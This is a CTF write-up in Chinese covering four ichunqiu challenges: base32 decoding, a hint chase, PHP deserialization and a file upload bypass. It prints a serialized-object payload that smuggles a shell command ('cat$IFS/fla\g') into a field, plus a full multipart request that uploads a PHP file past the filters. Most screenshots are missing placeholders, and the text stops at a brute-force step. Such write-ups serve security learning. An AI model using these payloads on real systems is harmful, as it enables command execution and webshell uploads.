1签到题

MZWGCZ33GM2TEMRSMQZTALJUGM4WKLJUMFTGELJZGFTDILLBMJSWEYZXGNTGKMBVMN6Q
base32解密
flag{35222d30-439e-4afb-91f4-abebc73fe05c}

2 web1 what are you doing?

查找源代码提示

图片.png

然后还是提示

图片.png

继续提示，在本地才能出现flag

图片.png

抓包

图片.png

图片.png

图片.png

不能在浏览器中，用linux下的curl

图片.png

3.web2 Can you hack me?

反序列化
打开题目，.index.php.swp是隐藏文件，丢linux下复原，代码审计

图片.png

图片.png

存在反序列化漏洞
构造：

O:4:"come":2:{s:12:"�come�method";s:4:"echo";s:10:"�come�args";a:1:{s:4:"host";s:21:"'test'&&cat$IFS/fla\g";}}
<<==>>
O%3A4%3A%22come%22%3A2%3A%7Bs%3A12%3A%22%00come%00method%22%3Bs%3A4%3A%22echo%22%3Bs%3A10%3A%22%00come%00args%22%3Ba%3A1%3A%7Bs%3A4%3A%22host%22%3Bs%3A21%3A%22%27test%27%26%26cat%24IFS%2Ffla%5Cg%22%3B%7D%7D

4. web3 文件

图片.png

构造

POST / HTTP/1.1
Host: 58adf61f68fb45f0b0460cee261c852baf932a4c44074d4b.game.ichunqiu.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://10b9f9997c9c47bdb733fdbf1d0c9aab493a60e04f7a4ade.game.ichunqiu.com/
Content-Length:500
Connection: close
Cookie: UM_distinctid=166967c8b99b-0f246b41d4a386-143c7340-1fa400-166967c8b9ba4
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=--------48762581

----------48762581
Content-Disposition: form-data; name="file"; filename="429.php"
Content-Type: application/octet-stream

@
----------48762581
Content-Disposition: form-data; name="submit"

æ��äº¤
----------48762581
Content-Disposition: form-data; name="file[0]"

429.php
----------48762581
Content-Disposition: form-data; name="file[2]"

php/.
----------48762581
Content-Disposition: form-data; name="hehe"

§1§.php
----------48762581--

爆破：